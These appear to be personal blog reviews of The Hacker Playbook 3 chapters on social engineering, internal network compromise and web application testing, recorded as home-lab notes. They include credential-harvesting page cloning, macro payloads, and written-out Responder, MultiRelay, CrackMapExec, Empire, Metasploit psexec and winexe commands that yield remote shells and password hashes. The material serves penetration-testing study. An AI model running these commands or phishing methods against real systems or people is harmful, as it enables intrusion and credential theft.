Posted in Blog, THP3

THP3 Ch 5 Review

Disclaimer: Educational purposes, personal reference, don’t do illegal hacking, IANAL, etc.

Note: THP3 is my primary source for this. I’m putting my thoughts and notes to help me remember the info while avoiding putting too much info from the book here. If you are considering buying the book, I highly recommend it. 

THP3 05 – The Screen – Social Engineering

Social engineering is a great way to get a foothold somewhere. If you’re unfamiliar with the basics, checkout Security through Education for some overview info. Chris Hadnagy’s book Social Engineering: The Science of Human Hacking, 2nd ed is also a good read. I’m about halfway through it right now. It’s a nice non-technical read to balance out the technical stuff. Kim mentions (and I concur) that checking out the Defcon SE CTF info would be a good idea. There’s a lot of good info out there, and SE attacks are still very effective. Plus it really is a nice balance to the hands-on-keyboard technical stuff. I wouldn’t call it a “break”, but a good change of pace.

Doppelganger Domains

See THP2 for more coverage – basically get a similar domain. Hope for typos, etc. Reap the rewards. Especially good for mimicking authentication pages and redirecting to the real page when creds are entered.

You can use the Social Engineering Toolkit (SET) to clone authentication pages. And a lot of other things, so check out the user’s manual available for download from the README page on Github. Going through the options is very straightforward. Setting up the VPS as the attack server is quick and easy. The config file needed updated to use Apache instead of python – change the APACHE_SERVER to ON (around line 95), set the APACHE_DIRECTORY (line 98ish), and adjust the HARVESTER_LOG (line 163ish). I want to go through the manual and some walkthroughs to get a better feel for the tool. I found a video from Packt on using SET that was helpful because it showed how to use it in a lab setup. I got it all setup with no problems. The Windows box I used really didn’t want to accept the edits to the host file to use the cloned login pages I created. This may be because I’m working in a host-only network. This StackExchange has a good list of things to try for troubleshooting. None of which made my Windows machine happy. I could force it to go, but I’ll have to look into it more. I wasn’t working on a new VM, so that may have been the issue. But it also looks like IE can be a little finicky with the hosts file.

Kim also recommends storing any passwords found in an encrypted fashion, such as with your public pgp key to protect the info in case of compromise. I think this is an important step to ensure that you (hopefully) could not be found liable if someone else obtained the same information elsewhere.

Creds with 2FA

On the defensive side, we like 2FA, preferably with something besides SMS. ReelPhish can be used to help deal with 2FA on the offensive side. Kim mentions running on Windows is preferred and gives a FireEye blog link. Other tools mentioned to bypass 2FA are evilginx, which was recently updated to version 2, and CredSniper. Both look like really good tools to experiment with for SE. Kim also mentions the importance of looking for places where 2FA might not be required.


Phishing remains one of the most important and effective attack vectors. People are getting better about avoiding and reporting, but it’s still worth attempting. Every company will handle training employees to handle phishing and handle reports of phishing differently. Reporting phishing emails should be encouraged, but it isn’t always. And there will inevitably be someone having a “bad” day who will click the phish link. GoPhish can be used for automated attacks. Other tools are Phishing Frenzy using Ruby and King Phisher using Python. The automation is good for mass, straightforward attacks. For targeted campaigns, it would be beneficial to use OSINT to create hand-crafted phishes.

Microsoft Word/Excel Macro Files

Oh the joy of Office macros! Yes, they can be beneficial, but the security risk is quite high. By default, Office files support VBA (Visual Basic for Applications) code. AV is getting better about detecting, but obfuscation can often allow it to work. Empire or Unicorn can be used to create payloads. The payload can be base64 encoded to get around some AV, though this is becoming well known and I’ve seen discussions of checking for specific keywords within base64 encoding. The process is straightforward – create payload, pop into Excel, create a macro, replace code with payload, convince receiver to Enable Content, and the payload executes. You can also embed .bat (batch files) into Office files. Newer versions likely won’t execute it, but if you can convince the receiver to move it to the desktop and execute, you’re good. LuckyStrike is available to make this more automated. VBad can also be used, but you have to enable macros yourself to use it. It heavily obfuscates your payloads and does several cool things. Call me paranoid, but I’d want to use this in a sandbox.

I think this sort of attack would be very effective in environments where people are used to getting documents from (somewhat) random people, especially at certain times of the year when attachments from people who aren’t actually known is expected.

Non-Macro Office Files – DDE

This section starts with a nod to timing – if you just happen to be doing a pentest when new vulnerabilities are exposed, well, that can be quite helpful. They Dynamic Data Exchange (DDE) protocol vulnerability was announced during one of Kim’s engagements, and the vuln can still be found. DDE is used for communication between applications. Sensepost wrote up how the exploit functions. There is an Empire stager to create the Word file and PS script (usestager windows/macroless_msword). Kim also mentions a toolkit to look for RCE in MS Office as well as generate malicious payloads, subdoc attacks and a subdoc tool. It looks to be straightforward, but I haven’t tried these out yet.

Hidden Encrypted Payloads

This section covers a couple encryptions tools. EmbedInHTML that will take a file, encrypt it, and embed it in an HTML file as a resource complete with automatic download routine. Demiguise generates HTML files containing an encrypted HTA (HTML Application) file.

Exploiting Internal Jenkins with Social Engineering

This chapter ended with a walkthrough of a Jenkins exploit that you can get full compromise with if the application is unauthenticated. The problem is the app is hosted internally, so to get the code to execute, you need to have a victim in the org visit a page with a stored XSS payload that allows WebRTC to expose the internal IP of a victim. Kim developed a tool specifically for this exploit. It will take the internal IP of a visitor and send the exploit to all servers in the /24 range. This requires Jenkins prior to 2.x.

Basic steps are set up a Jenkins server on a Windows VM with a bridged adapter. Put the exploit tool on Kali and set it up. Then visit the attack website from another system. The webpage will hit the internal network over 8080 with the payload, find the Jenkins server, and get the server to download/decrypt/execute the Meterpreter payload. Your machine may want to make the war file a zip, so rename it if necessary. Set up was straightforward. And remember to make sure that you’ve set up a server on the attack machine and a listener. I used my Kali VM and a simple Python server. I watched the server and saw when the Jenkins machine called the payload, but I didn’t get a shell. Something to play with later, but moving on for now.

As I was wrapping up this chapter, I also caught Episode 110 of the Privacy, Security, & OSINT Show that focused on testing your online security. The show notes have links to test browser security and would be a good idea to run to check your op sec. There was a site that would specifically check for the WebRTC, so a nice way to see if the fixes you apply are working.

Wrap Up

This chapter was a bit of a brain break after the last couple. Good info, but I’d recommend branching out into some of the dedicated social engineering material if this is an area of interest. The technical info here is a great complement to the SE stuff I’ve been going through that is more focused on soft-skills.

Next Steps

  • Figure out what was keeping the Jenkins exploit from working
  • Finish the SE book I’m reading
Posted in Blog, Resources, THP3

THP3 Ch 4 Review

Disclaimer: Educational purposes, personal reference, don’t do illegal hacking, IANAL, etc.

Note: THP3 is my primary source for this. I’m putting my thoughts and notes to help me remember the info while avoiding putting too much info from the book here. If you are considering buying the book, I highly recommend it. 

THP3 04 – The Drive – Compromising The Network

The focus of this chapter will be corporate environments and living off the land. A definite red team focus. I’m looking forward to working through THP2 once I’m done with this to fill in some blanks. There won’t even be a vuln scan run in this chapter, which is great because it helps avoid detection.

I’ll say upfront that this was a very frustrating chapter. Not because of what Kim covered, but because of the nature of setting up a more complicated virtual environment. Setting up the network was doable, but doing a mini-setup means there’s not a lot going on in the network. So a lot of the tools will likely work better in an actual environment than in the lab. Since I was also working with the current versions of the various Windows systems, there were likely some exploits that have been dealt with. I’ve spent a lot of time working through the tools and have them “working”, but not necessarily getting what they should on the network. Luckily I’ve got some labs available in a certification that I’m working on that I’ll be able to do some additional practice on. The experience with the tools and troubleshooting is invaluable, but it is frustrating when things don’t work like they should. It did lead me to chasing some alternatives and learning a ton. So in the end, it’s all good. I’m okay continuing to bang away at this while continuing in the book. I’ll take notes, keep track of tools, and apply the info as I’m working on other labs.

Finding creds outside the network

First up is getting an initial entry point. It can be complicated and resource-intensive. Kim recommends KISS. And goes straight to password bruteforcing. This makes sense given all of the authentication required with various enterprise services. And finding things that are authenticated using the victim’s sign-on info can provide a foothold. This will involve password spraying. Going after external sources is helpful because the log-in attempts might not be logged, stuff on the peripheral might not require multi-factor authentication, people reuse passwords, and account lockout might not be enabled. In short, external sources often have a lower security level.

Kim notes that the fake mail server doesn’t exist anymore, so I feel like testing options are limited here. I’ll go back and research options for testing mail servers later.

Spray from SpiderLabs is a password spraying that supports multiple enterprise services (OWA, Lync, CISCO Web VPN, etc.). Passwords to use should be chosen based on the company. Kim reports commonly successful passwords as those including season and year, local sports team and digits, looking at older breaches and using similar passwords, and company name plus year, numbers, and/or special characters. It’s a good idea to run these scans slowly to avoid lockout. Seems like a good use of a server. Spray includes user and password files in several languages. Make to take a look at the password files and update as appropriate with the current year and potentially sports teams as mentioned above.

To configure Spray, you’ll need to capture a POST request for a password attempt (use Burp or ZAP) and save the data to a file. Check out the README for Spray to get the details of how each spray option would need to be configured. I went through targeting the practice website. Script worked fine – just slow going.

Ruler by Sensepost can also do bruteforcing and can do some persistence exploitation as well. It does some autodiscovery of Exchange configuration and looks for creds. It’s a pretty cool tool. I’m going to have to find a way to do some work with both of these on test environments.

Moving through the network

This will be exploitation that occurs after gaining access to the network. It’s time to do some network setup. Microsoft licensing means it’s hard to find Windows VMs, and you have to build the network yourself. This has been on my to-do list, so it’s nice to have to do it for book club. I suspect I’ll need to pull in some additional resources. All of the Windows options expire after a set time.

First up, the server. Kim addresses Windows Server 2016 in THP3 and Windows Server 2012 in THP2. Microsoft provides VMs to test Edge and IE. They expire after 90 days, but Microsoft recommends creating a snapshot when first installing the VM to roll back to. That’s what I’ve done previously. You can get demo ISOs for the servers from Microsoft. I recommend taking snapshots frequently as you go. While walking through the entire setup process when you’ve forked something is educational, it can get old. Also check your time settings when your VMs to avoid time sync issues.

A few helpful walkthroughs dealing with VM setup and Windows Server 2016 from Couchbase and a Microsoft TechNet Wiki that includes complete lab setup info. Once you’ve got the VM loaded, time to set up Active Directory. Then add users using Active Domain Administrative Center or PowerShell. I found the PowerShell option quicker – just note the changes won’t show up until you refresh the management center.

 New-ADUser -Name "<name>" -SamAccountName "<name>" -AccountPassword(Read-Host -AsSecureString "Input Password:") -Enabled $true
 New-ADGroup -Name "<groupname>" -SamAccountName "<groupname>" -GroupScope "<scope>"
 Add-ADGroupMember -Identity <groupname> -Members <member1>,<member2>,<member3>

AD setup was surprisingly straightforward and intuitive (I’m sure I’ll regret saying that as I do more network setup), so onto setting up the client machines. This was a bit more finicky – make sure you’ve got everything on the same network and the network is set to private – which is annoyingly obscure on Win8.1. You’ll need to set your boxes to use the server as the DNS. Or at least that’s what I had to do because just adding it to the hosts file didn’t cut it. Luckily I’ve got a few more VMs to set up that I’ll continue figuring out the correct sequence. Sidenote – I’m also remembering just how much I disliked Windows 7 and 8.1.

Joining the domain once you’ve got the network lined up is pretty easy – Control Panel > System and Security > System > Advanced System Settings > Computer Name. Then click “Change” and select the Domain option. You can put in either the FQDN or the NetBIOS name. If you are having trouble using the NetBIOS option, try the FQDN.

Dealing with GPO…open up Group Policy Management in the server. Kim has the GOP set to disable firewall, disable AV, disable updates, add the Helpdesk group to the local admins group, and link the GPO to the root domain. Going forward, I’ll setup the GPO before adding other boxes to the network.

Important Steps for Setup

  • Download your VM builds (clients) and an ISO for the server from Microsoft

  • Load VMs – take snapshots before starting for the first time

  • Setup domain controller on server – set up static IP for server and set it to be the DNS server

  • Setup active directory on server

    • It would be a good idea to give the server a name that’s easy to remember, just makes life easier.

  • Create users and groups

  • Setup group policy (see below for details)

  • Setup clients to to join domain

    • Put all on Host-Only network (Not required, but is my preferred option; could also do a NAT network)

    • Set up server to be DNS server (Network Connections – Change settings of this connection – Adjust IPv4 settings)

    • Make sure the network is set to private (start setting up sharing and it should ask if you want to make it private – Network status – View Network computers and devices). It’s not as straightforward as it is for WiFi, so you may have to dig around a bit.

    • Control Panel – System and Security – System – Advanced System Settings

      • Change name to something specific

      • Click on Domain radio button and put in domain name

  • Clone client machines as desired

Set up group policy on server

  • Open up Group Policy Management

  • Edit an existing GPO or create a new one

  • Disable AV – Computer configuration > Policies > Administrative Templates > Windows Components > Windows Defender > Real-time Protection

  • Disable Firewall

    • Computer configuration > Policies > Administrative Templates > Network > Network Connections > Windows Firewall

    • Computer configuration > Policies > Windows Settings > Security Settings > Windows Firewall > Protect all network connections > Disables (set for Domain Profile and Standard Profile)

  • Disable updates – Computer configuration > Policies > Administrative Templates > Windows Components > Windows Update

  • Add Helpdesk to local admin group: Computer configuration > Preferences > Control Panel Settings > Local Users and Groups

    • New > Local Group > Administrators (Built-in)

    • Make sure action is Update

    • Add desired group

  • Only allow local login for Domain Admins, Local Administrators, and Helpdesk: Computer Configuration > Windows Settings > Security Settings > Local Policies > User Rights Assignment > Allow Logon Locally

  • Enable file and print sharing: Computer Configuration > Policies > Administrative Policies > Network > Network Connections > Windows Firewall > Allow inbound file and printer sharing

  • Disable SMB signing

    • SMB v1 disabled through a registry item in the GPO

    • SMB2 seems to need to be modified in the GPO to avoid breaking the policy

      • Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options

  • Make sure the GPO is linked to the domain

Overall, not too bad for the first time through. I got some errors about automatic logon, but I’m okay leaving that off since it wouldn’t likely be on in an enterprise environment.

On to installation of Internet Information Services (IIS)…Kim provides a link to a walkthrough. Run this command on your server, then make sure it worked by going to the IP in a browser.

 Install-WindowsFeature -name Web-Server -IncludeManagementTools

It also says to configure SPN (Service Principle Names). I connected the IIS server to a host header.

 Setspn -A HTTP/<hostname> <iisServerName>
 Setspn -A HTTP/ csklabserver

I also set up a file share just to do it. I may go back and add a few things to the network, but this was a good start. Getting the GPO setup was the most fiddly part. I ran into some issues where my server decided to go on a field trip and I had to fix the time settings, but otherwise it went smoothly.

On The Network With No Creds

First up is doing some digging around the network without creds. This is working from getting on the network in whatever way and digging around. This could be from physically infiltrating the site or other methods.

Responder was the first tool. It worked well. Just a matter of waiting for something usable. You can either catch hashes and crack them or set up a popup to ask for creds. Not stealthy, but would get the job done. Once you play with this a little, it’s fairly easy to use. I did have to install some tools to get Responder running without complaint – hcxtools and hcxdumptool. That was on my 64-bit Kali VM and I couldn’t recreate the issue on the 32 bit. A little odd, but reinforces the importance of testing your tools and knowing your setup.

Get to the Responder directory (/usr/share/responder in regular Kali build), start Responder, get the info, then use Hashcat or similar to crack the NTLMv2 hashes. Hashcat has a ton of options, so take a look at the details. (Side note – you might also want to check out Crunch to generate custom wordlists if you can find out about the password policies in place or OSINT info on the accounts you capture hashes for.)

 ./ -I <interface> -<options>
 hashcat -a <attackmode> -m <hashtype> <filetocrack> <wordlistfile> -r <rulefiles>

The Multi Replay option was much more of a pain to get working. I played with this quite a bit before a friend said he thought it only worked on Windows 2012 and earlier servers. This made sense to me because when I ran RunFinger to check the network, the only target identified was my WIn7 box. So I had to download the ISO for 2012 and spin up a new VM for it. And add it as an additional domain controller. Good networking practice at least. Things got a little wonky, so I decided to start again using my Win2012 server as the initial DC. Got that setup as above, get the VMs back on the domain, and I was able to get MultiRelay working. Major lesson learned – know what all SMB is doing on your network before messing with it. There are quite a few things with SMB1 dependencies, so even though it’s recommended to disable it, that can cause major issues. But the issue for MultiRelay is SMB signing, so that is what needs to be disabled in the GPO. I spent way more time messing with this than I should have, but I wanted to understand what was going on and what made the network vulnerable. I was able to get a Win2016 DC added to my 2012 network and use MultiRelay to get a shell on there. When you start with newer versions of Windows, the things that let MultiRelay work aren’t there anymore. Trying to access my share with Windows 10, I basically got a security warning that said “nope”.

MultiRelay related commands:

 # Start Responder in another terminal from responder folder
 ./ -I eth0 -rv
 # User RunFinger if desired to id targets; run from responder/tools folder
 ./ -i <IPrange>
 # Run MultiRelay from responder/tools folder
 ./ -t <targetIP> -u ALL [-c <commands or payload>]

A few more references…

User Enumeration Without Creds

Nmap has a script to enumerate users. Once I got the syntax, this worked well. The main limitation is having a viable userlist. The default list pulled the administrator account. Combine this with some OSINT, and you should be able to enumerate the users. Only issue is watch the syntax.

 nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='realmname' <DomainControllerIP>

If you have a wordlist (like the Metasploit namelist provided on Kali), you add ,userdb=<filename>.

 nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='thp3lab',userdb=/usr/share/wordlists/metasploit/namelist.txt

Scanning the Network with CrackMapExec (CME)

This focused on using Empire’s REST feature, so I’ll be going back to play more with CME because there a lot of options. I’m using my Kali VM since I’m using VirtualBox. There’s a nice writeup here on the basics. Note – I had to use crackmapexec to call the program rather than cme as in the book, depends on how you install. I got a KeyError: 'launcher' error. Did some digging and found a fix. Looking at the comments, it seems Empire changes regularly, so any tools used with it should be checked before they are needed. The fix did work – you have to make a couple edits to the /usr/lib/python2.7/dist-packages/cme/modules/ file (see the link for details). I got it to run with Empire, but it didn’t seem to connect. I think I may need to spend a week just messing around with Empire – it seems to be rather finicky.

Setting up the listener in Empire was a little fussy. Between the book, the Getting Shells 101 CME documentation, and general troubleshooting, I got my listener going. Make sure you’ve setup the cert in Empire. I ended up resetting Empire and generating a new cert.

 cd /opt/Empire

Then start Empire and setup the listener. Make the password whatever is in your config file for CME.

 ./empire --rest --password 'password'
 (Empire) > listeners
 (Empire: listeners) > uselistener http
 (Empire: listeners/http) > set Name cmeTest
 (Empire: listeners/http) > set Host <YourIP>:<Port>
 (Empire: listeners/http) > set Port <Port>
 (Empire: listeners/http) > set CertPath <CertPath> # default is data
 (Empire: listeners/http) > execute

CME also has a Meterpreter module. I gave that a shot since I’m pretty comfortable with Metasploit. Basically set up a handler, then run the CME using the metinject module. I wasn’t able to get a shell with this either, so I’m going to have to play with this some more. Both say the payloads have been executed, but no connection is made in either.

 crackmapexec IPrange -u username -p password -M <module> -o <options>
 crackmapexec -u user1 -p password -M empire_exec -o LISTENER=test #listener name
 crackmapexect -u user1 -p password -M metinject -o LHOST= LPORT=8443

You can also use Metasploit to see where the creds are valid using the smb_login module. CME is much faster though.

 msf > use auxiliary/scanner/smb/smb_login
 msf auxiliary(smb_login) > set RHOSTS <IP range>
 msf auxiliary(smb_login) > set SMBDomain <domain>
 msf auxiliary(smb_login) > set SMBUser <user>
 msf auxiliary(smb_login) > set SMBPass <password>
 msf auxiliary(smb_login) > services -p 445 -R
 msf auxiliary(smb_login) > run


I went chasing squirrels to better compromise the network. I didn’t get the foothold I wanted with the book’s tools, so I went looking for options. A friend had mentioned Impacket as an alternative to MultiRelay. Raj Chandel has a nice beginner’s guide, but like many of the guides the focus is listing what the tool does rather than putting it into practice. Metasploit Minute has a YouTube video that walks through some of the examples. I’ll keep working with this and the other network attacks. I like Impacket a lot and will keep exploring its capabilities. Once you get the hang of the syntax, it’s really easy to work with.

Found this nice write-up on using creds to own Windows boxes. I used the winexe option to get a shell and then used Empire to generate a one liner. I was able to get an agent established and send commands using modules on my Win7 box. I didn’t get the expected results though. Another step in the right direction at least. I suspect that the way I have my network setup doesn’t have the necessary SMB vulns to make this work.

 winexe -U domain/user%password //IP cmd.exe
 # In Empire
 usestager multi/launcher
 set Listener http

I suspect a lot of the issues I’m running into have to do with working with a small network with limited modification. It also seems like with SMBv3.0, things get a lot less effective. I got multiple errors putting the launcher code into the systems I had shell on.

Since I did have creds, using the psexec module in Metasploit worked well. I did have to specify the domain though.

 msf > use exploit/windows/smb/psexec
 msf exploit(window/smb/psexec) > set RHOST <targetIP>
 msf exploit(window/smb/psexec) > set SMBPass <password>
 msf exploit(window/smb/psexec) > set SMBUser <username>
 msf exploit(window/smb/psexec) > set SMBDomain <domain>
 msf exploit(window/smb/psexec) > run

This let me easily upload the Empire payloads, but I got errors with several of the options.

A list of related references in no particular order for future reference…

After Compromising Your Initial Host

Lots of info here about what to do once you have a shell. There’s also info about a Github repo script with a lot of the commands from The Red Team Field Manual that can be used to search for commands from the book. I also found another Github with RTFM inspired cheat sheets. I just got copies of this and The Blue Team Field Manual, and it’s nice to have an idea of how to make the material more portable and easier to search. Pretty cool.

Privilege Escalation

Getting from a regular user to a privileged user is always a goal.

Methods Kim listed

  • Unquoted service paths

  • Finding insecure registry permissions for services

  • Check if the AlwaysInstallElevated registry key is enabled

I didn’t go digging too much with these on my network because there was a Privilege Escalation lab using Metasploitable3. So onto that…

Privilege Escalation Lab

Getting Metasploitable3 up and running can be a little more finicky than other VMs. It’s not difficult, just a little different. I think the intro blog from Rapid7 has the simplest install instructions. I did have to adjust the network adapter used, but nothing significant. There are a lot of options in Metasploitable3 and lots of resources online to go through.

Running an nmap scan showed lots of open ports. Kim chooses to target ManageEngine. Searching ManageEngine in Metasploit shows several potential exploits to use. Kim chooses the connection_id option to explore. This works, but isn’t privileged, so onto checking out processes with ps. Kim points out Tomcat and that you can google to find where user info is stored. Then using dir to search for the file and type (basically the Windows equivalent to cat) to display it. Use the creds found to login to the Tomcat management console to make sure they work…ok, how to do that? The easiest option is going to a browser. There are CLI options, but it didn’t seem to be setup on the box. The browser was easier. Creds worked, so back to Metasploit to repeat the process with Tomcat. And get a connection error because Metasploitable3 decided to take a break. Get it back up and running, and the exploit worked as expected.

It was great to work with Metasploitable3 a bit. There’s definitely a lot to work with, so it stays on the list of things to work on. This chapter has been great to get a more extensive home lab built up. Having that experience will help me build a solid testing network on an old server I have.

Pulling Clear Text Credentials from Memory

Mimikatz has been an effective tools for getting passwords, but it doesn’t work with Windows 10. To get the passwords back in LSASS, you can adjust the registry key. It just requires the user re-login. Locking the workstation is the easiest way to accomplish this triggering a lockscreen (rundll32.exe user32.dll,LockWorkStation). Then run Mimikatz again to get the passwords.

Mimikittenz is a tool to get passwords from target processes, like browsers. You can also write search expressions within Mimikittenz. And it doesn’t require local admin access. But you have to get the script onto the box.

I used the psexec module in Metasploit to get to where I could use Mimikatz. I did some work in both Win7 and Win10. I had to migrate meterpreter to a 64bit process in Win10. I could load and run Mimikatz. It did warn me I was using Mimikatz on a newer OS and recommended Kiwi instead. Running Mimikatz didn’t get usable info (which was expected). I gave Kiwi a shot as recommended, and was able to get hashes.

I have been able to use Mimikatz in other labs, and it works well when the conditions are right. Kind of like most tools.

Getting Passwords from the Windows Credential Store and Browsers

The Windows Credential Store is where usernames, etc. are saved when MS IE or Edge save your info. Info is accessible by the user. There are scripts available to get the info – Get-WebCredentials and Gathering Windows Credentials. Empire also has an option to get creds from Chrom (payload powershell/collection/ChromeDump). There are also tools available to extract cookies and get info from file sharing utilities.

Getting Local Creds and Information from OSX

For understandable reasons, most resources, including THP3, focus on Windows. That’s what is found in most enterprise environments. But Macs exist and may be fairly prevalent depending on the environment. There are similar attacks to get info from Macs. Kim talks about using Empire to target Macs, specifically setting up an Office macro payload – launch Empire, get a listener going, then usestager osx/macro, set OutFile /tmp/, and generate the payload. It’s Base64 code executed by Python, which is installed by default on Macs. Pop open Excel, create a macro, and swap out your payload for the macro code. Then save as an xlsm. I don’t have a Mac to test on, so just an interesting read for now. I’ve not had luck finding options for testing on Mac OS unfortunately, so until I can find a way, at least I’ve got some ideas.

Living Off of the Land in a Windows Domain Environment

This section focuses on using PowerShell Empire, but the takeaway is that if you can upload PowerShell scripts, you can do a lot of damage.

General notes as I continue to play with things…

Service Principal Names

Service Principal Names can provide info on databases and web servers. The setspn.exe file can be used – it’s on Windows by default, so handy to avoid having to deliver payloads. Basic format is

 setspn -T <domain> -F -Q */*

T specifies the domain, F sets queries to be at the forest rather than domain level, Q specifies each target domain or forest, and */* queries everything. There are a lot of other options, so it might be helpful to check out the Microsoft wiki on setspn.

Querying Active Directory

This section focused on Empire and using PowerView. Since Empire is still giving me fits (meaning getting Empire payloads to work and get active agents), in the interest of time, I decided to use some of the other tools to do similar works. Instead of using Powerview to get info about Active Domain users, I used an Impacket example. The GetADUsers example will get info about the AD users including password last set and last logon dates. PowerView has queries to get user, group member, and computer info. It is another one of those things I’ll keep working with as I’m troubleshooting Empire. There are also Metasploit modules available to do similar tasks (in the post/windowsgather group).


This is a cool way of graphically looking at things. I used it for SANS 2018 Holiday Hack (KringleCon) – one of the exercises involved analyzing a Bloodhound file. It’s definitely handy. From a defense perspective, this would be very helpful to identify potential exploitation paths. It can be run through Empire and with a faster C# option (Sharphound). The ingestor has to be on the host system and multiple files are generated that then need to be pulled over for analysis. The wiki is a great resource and is what I used for KringleCon. Kim provided files to work with. Unfortunately they are in CSV format, and Bloodhound 2.0 only takes JSON. I may go back later and convert the CSV to JSON, but for now I’ll move on since I worked with Bloodhound for KringleCon. The built-in queries are useful, so the tool is easy to get functioning once you have the files.

Some additional Bloodhound resources from Kim:

Moving Laterally – Migrating Processes

When you have a box with multiple users, it’s common to make/migrate tokens of different users. Metasploit can do this with the incognito module. Empire uses steal_tokens. According to Kim, this can break shells, so it’s a good idea to inject a new agent into a process owned by a different user. Empire’s PSInject can be used for this.

Moving Laterally Off Your Initial Host

The simplest option to pivot is using the permissions of the current user to get another box. There are options for this in Empire (the find_localadmin_access module) and Metasploit (local_admin_search_enum). Empire also has a lot of other options, so it’s a matter of spending time with it. There is also an option using Windows Management Instrumentation (WMI) in Empire.

Lateral Movement with DCOM

Distributed Component Object Model (DCOM) is another option for moving laterally. DCOM applications can be checked in PowerShell using Get-CimInstance Win32_DCOMApplication.

Some resources for learning more…


Hashes are fairly easy to get – Mimikatz and Responder have both been used to grab hashes in this chapter. The hashes can be passed using either Empire (powershell/credentials/powerdump) or Metasploit (exploit/windows/smb/psexec). This is an older method, but may still be encountered.

Gaining Creds from Service Accounts

This sections talks about Kerberoasting. Powershell is used to pull ticket info into memory. PowerSploit could also be used. Then Mimikatz can be used to export the tickets. Then the tickets have to be downloaded for cracking. The hashes can be cracked with tgsrepcrack, John the Ripper, or Hashcat. There is also a module in Empire to do this.

Dumping the Domain Controller Hashes

Multiple options here. You can run commands on the domain controller and use Shadow Volume/Raw. NinjaCopy and DCSync can also be used.

Lateral Movement via RDP over the VPS

Back to that VPS setup earlier…basically infect host, SSH from attacker to the VPS, set up local port forward, set up port forward in Meterpreter, and open RDP on the attack box. It’s more involved than that, but that’s the basic approach.

Pivoting in Linux

dnscat2 and Meterpreter have their own forwarding. An SSH shell could be used with local file inclusion or remote code execution. There’s a mimipenguin tool similar to Mimikat to pull creds.

Privilege Escalation in Linux

Same basic approach as Windows. LinEnum is a big help to look for possible routes of exploitation. It does return a lot of info in my experience, but I’ve found it helpful in CTFs I’ve done. Kim also mentions Linux Exploit Suggester, which I’ve come across before. Raj Chandel has a great blog post on Linux privilege escalation that provides some additional options. Kim talks about DirtyCOW, which involves a race condition. The only problem is it can cause kernel panics, so you need to match the version to the kernel.

Linux Lateral Movement Lab

I had to switch these VMs over to VirtualBox. That turned into a bit of an adventure, so it turned into a separate blog post on converting VMs and dealing with IPs in a virtual lab. Just another hurdle to getting through this chapter. Good practice, but not exactly on-task. You do need sudo access to edit the interfaces file, so luckily Kim provided login info. There are likely other ways of doing it, but I didn’t want to spend any more time digging than I already had.

Scan the network, see what’s open. Check out the box that has a webserver setup. Several services running. Kim says a web fuzzer showed openCMS running Struts2, which has been involved in breaches before. Check Metasploit for an associated module, and give it a shot (struts2_content_type_ognl). Just running it with the default options, I didn’t get anywhere. When I kept reading and followed Kim’s steps, I still didn’t get anywhere. Or so I thought – this exploit will not show in Metasploit. It reports that the exploit was completed, but no session was created. Reading on to get the tidbit about going back to dnscat, I got everything working. I should remember to skim over the sections before I start when it’s been awhile since I read it. The dnscat shell is a bit slow, so there’s some patience required. Everything worked as it should, so on to DirtyCow. Had to switch over to a NAT Network for this so I could fetch DirtyCow. I ran into issues with wget being unable to resolve the host address. It seems that sometimes Ubuntu 16.04 and up has issues with DNS in VirtualBox. I decided that rather than track down a fix, I would just use my VPS since I can use its IP easily. Using that, I was able to get the DirtyCow exploit to work and add the suggestions Kim has to make the exploit more stable.

Following Kim’s direction, I was able to get over to the Jenkins box with out issue. Pulling up the Jenkins site using port forwarding was incredibly slow. Like so painfully slow you think it died slow. But I was able to see what I was supposed to see. I was able to get all the way through following Kim’s walkthrough. I followed his instructions the first time through to get through quickly since DirtyCow can be unstable. I’ll take more time to look around as I come back to the lab. The ending point from the book’s perspective was getting an .ibd file. I believe the database can be recovered from the .frm and .ibd files available as the db_backup user, but that will require some research

Wrap Up

Completing this chapter was a marathon effort. I think I’ve been working on it off and on for a month. It was a combination of maddening and frustrating. It was great because I learned a lot. But it was frustrating trying to track down why things weren’t working. Working with Active Domain and setting up a network was good experience. Taking that over to a server where I can build out a more complete network will be great. I had one or two servers plus several workstations going at once, but running all that with Kali did kill all my RAM and result in paused VMs. Not surprising.

Next Steps

  • Dedicate some time to Empire

  • Build network on server

  • Keep working on everything

  • Rejoice that chapters 5 and 6 are relatively low-key
Posted in Blog, Resources

THP3 Ch 3 Review

Disclaimer: Educational purposes, personal reference, don’t do illegal hacking, IANAL, etc.

Note: THP3 is my primary source for this. I’m putting my thoughts and notes to help me remember the info while avoiding putting too much info from the book here. If you are considering buying the book, I highly recommend it. 

THP3 03 – The Throw – Web Application Exploitation

I’ve been working on web app exploitation for bug bounty stuff, so I was excited for this chapter. Not much detail getting started – just notes to look elsewhere, specifically the OWASP Testing Guide. The other standard reference is The Web Application Hacker’s Handbook 2nd ed (WAHH). I have both and am using both. If you’re a video person and want a nice overview of web hacking, this Introduction to Web Hacking 101 from PAHackers and Brandon Keath is a really nice intro.

Kim notes that there haven’t been changes to many attacks since THP2, so they won’t be repeated. I get it, but I would have rather seen them included. The focus will be on newer critical exploits. If you need background in web app exploitation, I’m enjoying working on stuff from PentesterLab. I think the combination of this book and the other things I’m working on will give me a solid foundation for web app exploitation. Someone also brought up the OWASP Juice Shop at book club – this is another vulnerable app to attack and looks like a pretty good resource. The Natas wargame on OverTheWire is another good place to practice. I’ve done a little of it and plan to go back to it as I work through the various web hacking things I’m doing.

Bug Bounty Programs

This is a specific thing I’m targeting, so this was a nice section to have. Kim notes it takes 3-6 months to consistently find stuff, so that gives me a good time frame to keep in mind.

Common bug bounty programs:

There are more, just do some digging. Kim recommends starting with older or no-reward programs because they are less likely to have pros working on them. Remember to be careful about scope and what can be done.

I recommend starting with the resources already noted, the Cybrary Web Application Penetration Testing course (a bit dated, but good info) and Bug Crowd University. With those things done, I felt like I had a good handle on what went on in this chapter.

Something to note is that everything I’ve looked at stresses the importance of writing up your results in a solid way. This includes written documentation, screen shots, videos, and other ways of demonstrating proof of concept. Bug Crowd University has a very good primer on this and recommends using Markdown. I’ll second that recommendation – I’ve switched to using a Markdown editor to write blog posts and several other things, and it works very well. There are lots of Markdown options, but Typora seems to work well. It’s free while in beta and gets solid reviews. Visual Studio will also do Markdown, so it’s really a matter of finding what works for you. If you prefer online, I like StackEdit, and Dillinger gets good reviews.

